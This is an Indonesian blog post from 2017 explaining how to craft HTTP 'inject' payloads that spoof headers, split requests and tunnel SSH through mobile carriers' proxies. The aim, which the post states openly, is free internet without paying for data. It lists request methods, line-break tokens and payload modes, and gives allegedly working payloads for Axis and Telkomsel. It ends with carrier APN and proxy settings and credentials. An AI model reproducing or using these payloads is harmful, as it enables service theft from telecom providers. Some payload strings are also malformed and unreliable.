Sunday, August 20, 2017

Cara Membuat Payload Inject Yang Work

Dalam kesempatan kali ini saya Akan membahas bagaimana  cara membuat payload Inject yang work dan bagaimana Cara penerapannya yang benar .
Menggunakan internet gratis Sekarang Udah Sedikit Susah,  Tidak seperti dulu Waktu awal inject muncul mungkin belum terlalu menggunakan  payload,cukup menggunakan IP khusus atau Proxy Squid tanpa payload Bisa juga tanpa inject Udah bisa ber internet gratis,
 
ini adalah tantangan tersendiri buat para gretongan untuk terus berusaha mencari celah atau kelemahan dari pihak keamanan pelayanan Provider yang ada di indonesia.
Ada banyak sekali jenis payload. Tetapi karna keamanan semakin ketat maka kita juga membutuhkan payload Yang Benar-benar super ribet Dan Ruwet.


Sebelum anda membuat Payload yang Work terlebih dahulu Harus mengerti,memahami alur Dan fungsi-fungsi komponen yang ada di dalam  payload itu sendiri
Jika anda mencari artikel di Google untuk mengetahui Bagaimana cara membuat payload
cara membuat payload Inject yang work

Pasti dalam fikiran anda berfikir penasaran dan menimbulkan pertanyaan
dan dalam benak anda bertanya tanya.
Apa Sih  Payload itu dan apa fungsinya?
apa saja susunan payload ?
bagaimana menyusun payload yang benar?
bagaimana payload itu bisa work?
bagaimana cara membuat payload yang work??


Disini Saya akan Membahas semua Pertanyaan-pertanyaan Di atas  menurut dari pengalaman yang saya pelajari selama ini, untuk para pengunjung yang membaca artikel ini, Saya Saran kan jangan sampai ada Kalimat atau Kata yang terlewat kan Anda Baca Sampai akhir  Postingan biar anda benar-benar Mengerti,Setidaknya Memahami Sedikit
 
payload itu sendiri Adalah sebuah susunan Kode yang berfungsi untuk MeRequest  pengalihan jalur data ke proxy lokal dari Operator Seluler masing-Masing,  Yang di sisipi sebuah bug Host (http sender) dari Operator Seluler itu untuk proses kamuflase data, agar data yang kita Minta/masuk di anggap valid oleh proxy Tersebut Sehingga Kita bisa mengakses internet tanpa kuota

Setiap opsel hanya punya satu proxy yg di kasih untuk public jadi misal proxy dari opsel Axis 10.8.3.8 maka semua injector menggunkan proxy 10.8.3.8 untuk opsel Axis. Mungkin ada injector yang bisa di ganti - ganti host atau apanya ,itu mengganti bug nya bukan proxynya

Baca Juga Artikel Lainnya :  Cara Mencari Bug Host Operator 2017


Part 1 Pembahasan  Tentang Payload

    1. Code terpenting Yang wajib di gunakan dalam pembuatan Payload
    2. Jenis Jenis Koneksi
    3. Macam-Macam Mode Payload
    4. Code Code  Tambahan Yang bisa Di kreasikan Di dalam Payload
    5. Mengenali Kata Kunci Kode  Payload
    6. Penerapan Payload
    7. Contoh payload axis,Telkomsel yang masih work sampai saat ini
    8. Penerapan Proxy Ori Dan APN Operator

1. Code terpenting Yang wajib di gunakan dalam pembuatan Payload
  -  Method
  -  Protocol
  -  host
  -  Line

A. Untuk Code Method  Seperti Di bawah ini

GET
PUT
JEFF
POST
GETS
HEAD
MOVE
TRACE
DELETE
PROFIND
OPTIONS
CONNECT
Yang Sering Di Gunakan Biasa nya Menggunakan Kode GET,HEAD,CONNECT


B. Protocol atau Bisa di sebut HTTP Ada Dua macam

     -    HTTP/1.1
     -    HTTP/1.0
Protokol HTTP/1.1 biasanya berada di BUG sedangkan HTTP/1.0 itu protocol untuk SSH. Tergntung jenisnya


C. Host : yang mempunyai peran sangat penting untuk membuat payload yang work kita memanfaat kan Bugs dari pihak Opsel


D. Line, ada 4 jenis line yang bisa digunakan yaitu:
[cr] = Carriage Return, U+000D
[lf] =  Line Feed, U+000A
[crlf] =  CR (U+000D) di ikuti oleh LF (U+000A)
[lfcr] = LF (U+000A) di ikuti oleh CR (U+000D)
[crlf][crlf] = Untukmenunjukkan akhir dari HTTP header

2. Jenis Jenis Koneksi

[realData] = koneksi yang akhiranya memiliki 2 LINE [crlf][crlf]
Contoh jika menggunakan SSH = CONNECT ipssh:portssh HTTP/1.0[crlf][crlf]
Tergantung jenis koneksi              
[netData] = koneksi yang akhiranya TIDAK memiliki LINE. Dan biasanya digunakan untung menambah payload lain semisal Host, Connection, dll
Contoh jika menggunakan SSH = CONNECT ipssh:portssh HTTP/1.0
Dan jika dikuti oleh BUG maka = CONNECT ipssh:portssh HTTP/1.0[crlf]Host: bug.com[crlf][crlf]
Tergantung jenis koneksi. Dan jika di ikuti Bug maka ditambah 1 LINE baru di ikutiBUG dan di akhiri 2 LINE

3. Macam-Macam Mode Payload

- Normal
- Front Inject
- Back Inject
- Front Query
- Back Query

isi dari request yang akan dikirim

- Normal
Yang artinya koneksi diletakan diawal kemudian di ikuti oleh bug payload dengan 1 LINE [crlf]
Contoh 1 = [netData][crlf]Host: bug.com[crlf][crlf]
ATAU
Contoh 2 = CONNECT ipssh:portssh HTTP/1.0[crlf]Host: bug.com[crlf][crlf]

- Front Inject artinya depan
Jadi bug itu diletakan di depan selanjutnya di ikuti koneksi (ssh/vpn/direct itu tergantung)
Contoh 1 = GET http://bug.com/HTTP/1.1[crlf]Host: bug.com[crlf][crlf][realData]
ATAU
Contoh 2 = GET http://bug.com/HTTP/1.1[crlf]Host: bug.com[crlf][crlf]CONNECT ipssh:portssh HTTP/1.0[crlf][crlf]

- Back artinya belakang

Jadi koneksi dulu (ssh / vpn / direct tergantung ) kemudian di ikuti bug
Contoh 1 = [realData]GEThttp://bug.com/HTTP/1.1[crlf]Host: bug.com[crlf][crlf]
ATAU
Contoh 2 = CONNECT ipssh:portssh HTTP/1.0[crlf][crlf]GET http://bug.com/HTTP/1.1[crlf]Host: bug.com[crlf][crlf]

- Front Query
Artinya ada Bug yg diselipkandidepan koneksi kemudian diakhiri @
Contoh = CONNECTquery.com@ipssh:portssh HTTP/1.0[crlf][crlf]GEThttp://bug.com/HTTP/1.1[crlf]Host: bug.com[crlf][crlf]
Query bisanya sama dengan Bug itu sendiri

- Back Query
Artinya ada Bug yangdiselipkan dibelakang koneksiyang diawali @
Contoh = CONNECT ipssh:portssh@query.comHTTP/1.0[crlf][crlf]GEThttp://bug.com/HTTP/1.1[crlf]Host: bug.com[crlf][crlf]
Query bisanya sama dengan Bug itu sendiri

  4. Code Code  Tambahan Yang bisa Di kreasikan Di dalam Payload

-    Host: bug.com
-    X-Online-Host: bug.com
-    X-Forward-Host: bug.com
-    X-Forwarded-For: bug.com
-    Connection: Keep-Alive atau Close
-    Proxy-Connection: Keep-Alive atau Close
-    Content-Type: */*
-    Content-Length: 0 atau 1024 atau 999999 atau yg lain
-   User Agent
-    Dan masih banyak lagi

5.Mengenali Kata Kunci Kode  Payload

[cr] = #13 = \r
[lf] = #10 = \n
[crlf] = #13#10 = \r\n
[lfcr] = #10#13 = \n\r
[host] = host
[port] = port
[host_port] = Host:Port
[host]:[port] = Host:Port
[protocol] = Protocol = HTTP/1.1
[ua] = User Agent
[real_raw] = CONNECT [host_port] [protocol][crlf]crlf]
[raw] = CONNECT [host_port] [protocol]
[netData] = CONNECT [host_port] [protocol]
[split] = [Request1] >> Delay >> [#Request2]
[instant_split] = [#Request1] >> [#Request2]
[x-split] = [#Request1] + [Request2 >> [#Request2]
[split-x] = [#Reques1] + [Request2] >> Delay > [#Request2]
[reverse_split] = [#Reques2] >> [#Reques1]
[repeat_split]= [#Request1] >> [#Request1]

cara membuat payload Inject yang work


5.Penerapan Payload
  
Untuk Penerapan payload sudah di jelaskan di nomor 1 di atas code-code terpenting atau yang wajib di gunakan dalam Pembuatan payload

REQUEST METHOD
Contoh : CONNECT http://bug.com/ HTTP/1.1[crlf]
               GET http://bug.com/ HTTP/1.1[crlf]
               HEAD http://bug.com/ HTTP/1.1[crlf]
               POST http://bug.com/ HTTP/1.1[crlf]

X-TRA HEADER
Contoh : X-Online-Host: bug.com[crlf]
               X-Forward-Host: bug.com[crlf]
               X-Forwarded-For: bug.com[crlf]
               X-Ping-Back: bug.com[crlf]

LINE BREAK
Contoh : [cr] [lf] [crlf] [lfcr]
 
Mode [raw] 1 [Front]
Contoh :
            GET http://bugs.com/ HTTP/1.1[crlf]Host: bugs.com[crlf]X-Online-Host:                  
             bugs.com[crlf]Connection: Keep-Alive[crlf][crlf][split][raw][crlf][crlf]

Mode [raw] 2 [Back]
Contoh :
             [raw][crlf][split]GET http://bugs.com/ HTTP/1.1[crlf]Host: bugs.com[crlf]
             X-Online-Host: bugs.com[crlf]Connection: Keep-Alive[crlf][crlf]

Mode [real_raw] 1 [Front]
Contoh :
               GET http://bugs.com/ HTTP/1.1[crlf]Host: bugs.com[crlf]
               X-Online-Host:  bugs.com[crlf]Connection: Keep-Alive[crlf][crlf][split][real_raw]
              [crlf][crlf]


Mode [real_raw] 2 [Back]

Contoh : [real_raw][crlf][split]GET http://bugs.com/ HTTP/1.1[crlf]Host: bugs.com[crlf]              X-Online-Host: bugs.com[crlf]Connection: Keep-Alive[crlf][crlf]


Untuk mengkreasikan Payload anda bisa menggunakan Kode tambahan yang sudah saya jelaskan Di NO 4 seperti :
-    Content-Type: */*
-    Content-Length: 0 atau 1024 atau 999999 atau yg lain
-   User Agent


7. Contoh payload axis Hitz,Telkomsel Vimax yang masih work sampai saat ini


Saya berikan contoh Payload Operator yang Masih Work Sampai saat ini dan anda bisa menggunakan nya,untuk bugs nya anda bisa cari sendiri


Payload Axis HITZ Work : CONNECT bugs.com/ HTTP/1.0[crlf]Connection: Keep-Alive[crlf]Host: bugs.com[crlf]Content-Length: 999999999999[crlf][netdata][crlf][lf][lf][lf][netdata][netdata][crlf][crlf]GET /bugs.com/ HTTP/1.0[crlf]Connection: Keep-Alive[crlf]Host: bugs.com[crlf]Content-Length: 123.xl.co.id/min_balance7[crlf][netdata][crlf][lf][lf][lf][netdata][netdata][crlf][crlf


Payload Telkomsel Vmax Work : POST http://bugs.com HTTP/1.1[instant_split]GET bugs.com HTTP/1.1[instant_split][crlf]Host: [host-port][crlf]X-Forwarded-Proto: http[crlf]Connection: Keep-Alive[crlf]User-Agent: [ua][crlf][crlf]


8. Untuk Penerapan Proxy Ori Dan APN Operator Seperti Di bawah Ini

1. Kartu Telkomsel (Simpati dan AS)
apn: telkomsel
proxy: 10.1.89.130
port: 8000
username: wap
password: wap123

2. Kartu Indosat (Mentari dan IM3)
apn: indosatgprs atau www.indosat-m3.net
proxy: 10.19.19.19
port: 8080
username: dikosongkan
password: dikosongkan

3. Kartu Three (3AON)
apn: 3gprs
proxy:  10.4.0.10
port: 3128
username: 3gprs
password: 3gprs

4. Kartu Axis
apn: axis
proxy: 10.8.3.8
port: 8080
username: axis
password: 123456

5. Kartu XL
apn: www.xlgprs.net
proxy: 202.152.240.50
port: 8080
username: xlgprs
password: proxl

Demikian Artikel Tentang cara membuat payload Inject yang Work Jika anda ingin mencopy Artikel saya Jangan Lupa Sertakan Sumber nya,Semoga bisa Menambah Pengetahuan Anda dalam dunia Phreaker ..

BERITA LENGKAP DI HALAMAN BERIKUTNYA

Halaman Berikutnya

1 blogger-facebook